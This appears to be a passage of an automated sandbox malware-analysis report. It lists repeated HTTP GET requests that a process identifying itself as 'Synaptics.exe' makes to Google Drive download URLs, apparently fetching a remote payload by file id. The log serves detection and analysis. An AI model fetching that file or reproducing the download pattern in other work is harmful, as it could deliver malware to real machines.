                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
